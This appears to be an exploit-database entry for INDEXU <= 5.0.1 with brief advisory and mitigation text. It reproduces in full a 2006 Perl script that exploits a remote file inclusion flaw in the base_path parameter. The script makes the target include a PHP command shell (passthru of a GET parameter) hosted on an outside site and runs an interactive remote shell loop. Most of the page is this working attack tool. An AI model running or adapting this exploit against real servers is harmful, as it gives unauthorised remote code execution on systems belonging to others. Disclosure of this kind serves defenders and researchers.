header-logo
Suggest Exploit
vendor:
INDEXU
by:
K-159
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: INDEXU
Affected Version From: INDEXU <= 5.0.1
Affected Version To: INDEXU <= 5.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit

INDEXU <= 5.0.1 is vulnerable to a remote file inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This exploit allows an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is validated and filtered before being used in file operations. Additionally, the application should be configured to only allow the inclusion of files from a limited set of directories.
Source

Exploit-DB raw data:

#!/usr/bin/perl
##
# INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit
# Bug Found & code By K-159
#
# base on advisory at http://echo.or.id/adv/adv26-K-159-2006.txt
#
# code reference from ExploiterCode.com
##
# www.echo.or.id (c) 2006
#
##
# usage:
# perl indexu.pl <target> <cmd shell location> <cmd shell variable>
#
# perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
##
# #
#greetz:echo|staff(y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous),kaiten,an0maly,SinChan,sakitjiwa,rizal,etc
#
# Contact:  eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net
##

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.' application.php?base_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[ê]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print "\n============================================================================\r\n";
 print " *INDEXU <= 5.0.1 base_path Remote File Inclusion Exploit*\r\n";
 print "============================================================================\r\n";
 }
sub usage()
 {
 head();
 print " Usage: perl indexu.pl <target> <cmd shell location> <cmd shell variable>\r\n\n";
 print " <Site> - Full path to INDEXU ex: http://www.site.com/indexu/ \r\n";
 print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";
 print " <cmd variable> - Command variable used in php shell \r\n";
 print "============================================================================\r\n";
 print "                           Bug Found by K-159 \r\n";
 print "                    www.echo.or.id #e-c-h-o irc.dal.net \r\n";
 print "============================================================================\r\n";
 exit();
 }

# milw0rm.com [2006-04-04]

Navigation

Suggest Exploit

Services By CQR